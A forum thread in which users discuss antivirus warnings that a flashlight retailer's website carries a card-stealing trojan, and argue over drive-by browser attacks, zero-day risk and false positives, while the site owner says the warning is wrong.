Today malware reported by more than a few different scanners.
I had this, too. The server, where our Website runs on, was hacked, and some code was integrated into the pages. I know it was a real threat because at that time I had hand-written the pages and could read what’s going on. It’s easy to catch data that is going to be send back to the server and forward it to someone. Fortunately, this kind of code is Javascript running on the client so Anti-Malware can find it.
==
The Reddit thread has more and more up to date information on what’s going on with the website.
https://www.reddit.com/r/flashlight/comments/etpkkk/avast_warns_that_intloutdoorcom_is_infected_with/
PS: A good illustration of a drive-by Trojan attack - Andrew Patrick
A good illustration of a drive-by Trojan attack
If you keep your browser updated, you probably will never have problems with this sort of thing.
It only happens using a browser vulnerability.
So if you are told it can never happen, that’s true, IF you keep your browser updated and if you don’t happen to be targeted by a new attack before the protection tools are updated to block it (a “”zero day”“:zero day attack examples - Google Search attack)
As they say, “do ya feel lucky? Do ya?”
Most of us are lucky most of the time.
I noticed about a week a go [still showing] on intl outdoor a Norton warning stating- Unsafe - Threats 17.
That’s not true. A vulnerability does not need your permission and will not be so kind to ask for consent.
While the wild west days of IE and third party vectors (adobe/flash) are history; the complexity of modern web browsers bring many opportunities for the wicked.
That is untrue and dangerous to spread. There are malwares that can infect you without ever clicking a “bad link”, etc.
Example?
I haven’t heard of any.
Sure there may have been exploits for small things, like leaking some info about you etc, but none that allowed execution of code on the client. Spectre/meltdown is mostly bs. In theory you can exploit it to steal things from memory, but in practice chances you get something useful out if it are 0.
I did a lot of kiddy-hacking when I was in high-school. Those were some interesting times because you could get trojans from everywhere. There was mirc and people were accepting exes easily 
And there was a trojan called sub7 that was spread very fast and you could find many infected pcs just by scanning IPs and ports and then connect to them and taking full control over their computer. Very fun times.
But now it’s different. There are much more people on the internet today, but all that stuff is almost impossible to do. It’s very hard to get full access to other computers mainly because software is now sandboxed, and very hard to access data over network because of https.
Let’s see, who should I trust about zero day risk — Malwarebytes and Bill Gates, or some guy on the Internet?
What, me worry?
There is no virus on our site, we have already reported this issue to Norton, I believe they will remove our site from the black list in several days time.
BTW if someone wants to report a false positive for avast:
I think they got triggered by the credit card fast checkout JavaScript. That or there is really another script hidden somewhere that steals the credit card infos.
Very dangerously incorrect. Unfortunately browsers are not safe sandboxes, as would be desirable.
Arbitrary/remote code execution vulnerabilities do exist. Just one very recent example with known “targeted attacks in the wild abusing this flaw”: Security Vulnerabilities fixed in Firefox 72.0.1 and Firefox ESR 68.4.1 — Mozilla
Browser can and do have vulnerabilities, which luckily usually get patched quickly. Plug-ins extend the attack surface and those don’t get as frequently updated, so it’s best to stick to well-known and well-maintained ones. And that’s not even getting into javascript which is a security headache.
Then read again hank’s post. You’ve been provided some real world infection examples yet you refuse to acknowledge that.
It’s all well and good to come on here and declare ‘it’s all safe, nobody needs to worry’ or ‘it’s a false positive, it’s safe, report it to your antivirus’ But with respect, whilst everyone’s antivirus is flagging this as a trojan card stealer, not just mine , I’ll go with the advice of the security companies for now, rather than the word of someone I don’t know at all, and since I am not qualified or know for sure it’s not a trojan it’s probably not a good idea to suggest people report it as a ‘false positive’ as they don’t know, and nor do you.
The truth is YOU don’t know for sure at all, you are just best guessing.
Until such time as it is declared safe, I’d be wary about suggesting people ignore all the warnings and go ahead using the site as normal/buying. Of course if people want to, fine.
For now, it is only Norton reports “virus aleart” for our site, all the other major “virus scan sites” including Kaspersky, ESET verify
our site as SAFE, you can check it.
Norton uses outdated information which they will refresh their “black list” soon.
My Avast is still blocking it.
I can access it just fine with a VM running Avast and another running Norton.
I don’t see any problems with his site either. Win10 + defender
Also google doesn’t report anything Google Transparency Report
Norton has it blacklisted for no apparent reason though.
Well Avast is selling user data so it’s not like you can completely trust antiviruses, a lot of the time they give false positives on stuff that’s actually just a normal part of how the software/site works.